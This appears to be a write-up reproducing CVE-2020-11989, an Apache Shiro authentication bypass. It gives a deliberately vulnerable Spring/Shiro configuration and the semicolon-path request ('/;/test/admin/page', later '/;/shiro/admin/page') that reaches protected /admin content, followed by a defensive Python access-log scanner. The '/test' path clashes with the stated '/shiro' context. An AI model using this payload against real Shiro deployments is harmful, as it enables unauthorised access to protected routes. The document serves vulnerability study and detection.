
Title: Shiro Permission Bypass Vulnerability Recurrence (CVE-2020-11989)


Affected Versions

Apache Shiro < 1.5.3

Shiro is the only authentication layer used in the Spring application

Environment Setup

git clone https://github.com/l3yx/springboot-shiro.git

Import the project into IDEA (the demo environment here is macOS) and configure Maven in:

/usr/local/Cellar/maven/3.6.3_1/libexec/conf/settings.xml

Add a local mirror (inside the <mirrors> element of settings.xml):

<mirror>
  <id>alimaven</id>
  <mirrorOf>central</mirrorOf>
  <name>aliyun maven</name>
  <url>http://maven.aliyun.com/nexus/content/repositories/central/</url>
</mirror>

<!-- The two central repositories below are built into Maven itself, serve the whole Internet, are maintained by the Maven team, and hold a very complete set of jar packages, including most popular open source project components in the world -->

<!-- Central repository 1 -->
<mirror>
  <id>repo1</id>
  <mirrorOf>central</mirrorOf>
  <name>Human Readable Name for this Mirror.</name>
  <url>http://repo1.maven.org/maven2/</url>
</mirror>

<!-- Central repository 2 -->
<mirror>
  <id>repo2</id>
  <mirrorOf>central</mirrorOf>
  <name>Human Readable Name for this Mirror.</name>
  <url>http://repo2.maven.org/maven2/</url>
</mirror>


Change the Maven home directory and the user settings file in IDEA's configuration:


Generate the war package:


Deploy the packaged war in Tomcat. Successful exploitation requires two conditions:

1. The application must not be deployed at the root context; a context-path is required, e.g. server.servlet.context-path=/shiro. At the root the context-path is empty and the URL is reformatted by the patch for CVE-2020-1957. Note that if the Shiro version is below 1.5.2, this condition does not apply.

2. The Spring controller performs no additional permission checks of its own.

The permission configuration of the vulnerable environment is as follows; the routes under /admin require login to access:

// Shiro filter chain definition in the Spring configuration class
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean() {
    ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
    bean.setSecurityManager(securityManager());
    bean.setLoginUrl("/login");
    bean.setSuccessUrl("/index");
    bean.setUnauthorizedUrl("/unauthorizedurl");
    Map<String, String> map = new LinkedHashMap<>();
    map.put("/doLogin", "anon");   // login endpoint is reachable anonymously
    map.put("/admin/*", "authc");  // routes directly under /admin require authentication
    bean.setFilterChainDefinitionMap(map);
    return bean;
}

---

// Protected route in the Spring controller, with no permission check of its own
@GetMapping("/admin/page")
public String admin() {
    return "admin page";
}

Vulnerability Reproduction

Accessing /shiro/admin/page directly returns a 302 redirect to the login page.


Accessing /;/test/admin/page instead bypasses Shiro's permission check entirely and reaches the content under the /admin route.

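As an added defender-side example (not from the original post or the demo project), the following Python scans constructed Tomcat-style access-log lines for the path-view mismatch behind this bypass: it compares the path the servlet container routes on with a simplified model of the older Shiro path cleaning, and flags requests that reach the protected /admin/* chain only on the container side. The Shiro-side model, the log format and the sample lines are assumptions constructed for this example, and the matcher generalizes to any Ant-style chain definition.

```python
import re
from urllib.parse import unquote

# Filter chain from the write-up: routes directly under /admin need "authc".
PROTECTED_PATTERNS = ["/admin/*"]
def ant_match(pattern: str, path: str) -> bool:
    """Shiro/Ant-style match: '*' spans one segment, '**' any depth."""
    regex = re.escape(pattern).replace(r"\*\*", ".*").replace(r"\*", "[^/]*")
    return re.fullmatch(regex, path) is not None
def strip_context(path: str, context_path: str) -> str:
    if context_path and path.startswith(context_path):
        path = path[len(context_path):]
    return path or "/"
def container_view(raw_uri: str, context_path: str) -> str:
    """Path the container routes on (Tomcat approximation): ';k=v' matrix params
    are dropped per segment and empty segments collapse, so '/;/shiro/admin/page'
    still reaches '/admin/page' under the '/shiro' context."""
    path = unquote(raw_uri.split("?", 1)[0])
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return strip_context("/" + "/".join(s for s in segments if s), context_path)
def shiro_legacy_view(raw_uri: str, context_path: str) -> str:
    """Simplified model (an assumption here, not Shiro's code) of pre-1.5.3 cleaning:
    the URI is cut at the FIRST ';' before the context path is removed, so
    '/;/shiro/admin/page' degrades to '/' and matches no filter chain."""
    path = unquote(raw_uri.split("?", 1)[0]).split(";", 1)[0]
    return strip_context(path, context_path)
def is_bypass_attempt(raw_uri: str, context_path: str) -> bool:
    """True when the container reaches a protected path the legacy matcher missed."""
    reaches = any(ant_match(p, container_view(raw_uri, context_path)) for p in PROTECTED_PATTERNS)
    guarded = any(ant_match(p, shiro_legacy_view(raw_uri, context_path)) for p in PROTECTED_PATTERNS)
    return reaches and not guarded
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
def scan_access_log(lines, context_path="/shiro"):
    """Return (request_uri, status) for every access-log line that looks like the bypass."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and is_bypass_attempt(m.group(1), context_path):
            hits.append((m.group(1), int(m.group(2))))
    return hits

# Constructed Tomcat-style access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2020:11:20:22 +0800] "GET /shiro/admin/page HTTP/1.1" 302 -',
    '10.0.0.5 - - [01/Jul/2020:11:20:41 +0800] "GET /;/shiro/admin/page HTTP/1.1" 200 10',
    '10.0.0.7 - - [01/Jul/2020:11:21:03 +0800] "GET /shiro/admin/page;jsessionid=AB12 HTTP/1.1" 302 -',
    '10.0.0.7 - - [01/Jul/2020:11:21:10 +0800] "POST /shiro/doLogin HTTP/1.1" 200 5',
]
```

Only the second line is reported; the ordinary ;jsessionid= request is seen identically by both views and stays quiet, which is the property a low-noise detection for this bug needs.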
